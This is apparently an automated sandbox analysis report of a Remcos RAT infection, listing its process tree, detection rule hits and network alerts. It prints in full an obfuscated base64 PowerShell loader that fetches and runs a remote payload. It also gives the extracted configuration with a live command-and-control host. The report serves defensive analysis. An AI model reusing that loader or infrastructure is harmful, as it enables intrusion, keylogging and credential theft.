      • powershell.exe (PID: 6332 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 3200 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3312 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2192 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 764 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1080 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3672 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNz
aUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5348 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1544 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 732 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["abokirem.duckdns.org:56379:1"], "Assigned name": "Aboki", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-J4I3IV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
Source | Rule | Description | Author | Strings
0000003C.00000002.3315313393.00000000086E5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000031.00000002.2500631742.0000000002E08000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000003C.00000002.3037711043.0000000005E4B000.00000040.00000800.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x7a56a:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000046.00000002.4179942082.000000000AFF1000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x8b0e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
  • 0x12ce6:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000A.00000002.1661372685.00000000082E3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
(99 entries in total; the remaining entries are not shown here)
Source | Rule | Description | Author | Strings
10.2.powershell.exe.8a71288.4.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
10.2.powershell.exe.8a71288.4.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
10.2.powershell.exe.8a71288.4.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
10.2.powershell.exe.8a71288.4.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x69308:$a1: Remcos restarted by watchdog!
  • 0x69880:$a3: %02i:%02i:%02i:%03i
10.2.powershell.exe.8a71288.4.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x63594:$str_a1: C:\Windows\System32\cmd.exe
  • 0x63510:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63510:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63a10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x64010:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x63604:$str_b2: Executing file:
  • 0x6444c:$str_b3: GetDirectListeningPort
  • 0x63e00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x63f80:$str_b7: \update.vbs
  • 0x6362c:$str_b9: Downloaded file:
  • 0x63618:$str_b10: Downloading file:
  • 0x636bc:$str_b12: Failed to upload file:
  • 0x64414:$str_b13: StartForward
  • 0x64434:$str_b14: StopForward
  • 0x63ed8:$str_b15: fso.DeleteFile "
  • 0x63e6c:$str_b16: On Error Resume Next
  • 0x63f08:$str_b17: fso.DeleteFolder "
  • 0x636ac:$str_b18: Uploaded file:
  • 0x6366c:$str_b19: Unable to delete:
  • 0x63ea0:$str_b20: while fso.FileExists("
  • 0x63b49:$str_c0: [Firefox StoredLogins not found]
(7 entries in total; the remaining entries are not shown here)

                System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\xdlilvqihrr", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\xdlilvqihrr", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0l
PLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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

                Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3676, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd

                Stealing of Sensitive Information

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3676, TargetFilename: C:\ProgramData\remcos\logs.dat
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-11T16:44:49.861966+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 37.120.208.40 | 56379 | TCP
2025-02-11T16:44:53.955678+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49713 | 37.120.208.40 | 56379 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-11T16:44:53.577506+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.9 | 49715 | 178.237.33.50 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-11T16:44:37.600161+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49708 | 168.119.145.117 | 443 | TCP
2025-02-11T16:44:49.946301+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49710 | 168.119.145.117 | 443 | TCP
2025-02-11T16:45:03.233536+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49717 | 168.119.145.117 | 443 | TCP
2025-02-11T16:45:15.673663+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49718 | 168.119.145.117 | 443 | TCP
2025-02-11T16:45:29.961363+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49719 | 168.119.145.117 | 443 | TCP
2025-02-11T16:45:43.035106+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49721 | 168.119.145.117 | 443 | TCP
2025-02-11T16:46:01.388292+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49722 | 168.119.145.117 | 443 | TCP
2025-02-11T16:46:14.638230+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49723 | 168.119.145.117 | 443 | TCP
2025-02-11T16:46:28.399978+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49724 | 168.119.145.117 | 443 | TCP
2025-02-11T16:46:46.741684+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49725 | 168.119.145.117 | 443 | TCP
2025-02-11T16:47:05.144589+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49726 | 168.119.145.117 | 443 | TCP
2025-02-11T16:47:18.757406+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49727 | 168.119.145.117 | 443 | TCP
2025-02-11T16:47:42.736383+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49728 | 168.119.145.117 | 443 | TCP
2025-02-11T16:48:01.631421+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49729 | 168.119.145.117 | 443 | TCP
2025-02-11T16:48:20.935576+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49730 | 168.119.145.117 | 443 | TCP
2025-02-11T16:48:40.919842+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49731 | 168.119.145.117 | 443 | TCP
2025-02-11T16:48:54.752947+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49732 | 168.119.145.117 | 443 | TCP
2025-02-11T16:49:08.244496+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49733 | 168.119.145.117 | 443 | TCP
2025-02-11T16:49:21.593622+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49734 | 168.119.145.117 | 443 | TCP



                AV Detection

Source: 10.2.powershell.exe.8a71288.4.raw.unpack; Malware Configuration Extractor: Remcos {"Host:Port:Password": ["abokirem.duckdns.org:56379:1"], "Assigned name": "Aboki", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-J4I3IV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: Yara match; File source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000003C.00000002.3315313393.00000000086E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000031.00000002.2500631742.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.1661372685.00000000082E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000002C.00000002.2493453882.0000000007665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000041.00000002.3913041557.0000000008AD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.1636313804.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000050.00000002.3570365875.0000000000526000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000046.00000002.4032457091.0000000006FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.1961674745.000000000780D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000001B.00000002.1970540185.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.1821567285.00000000085C7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
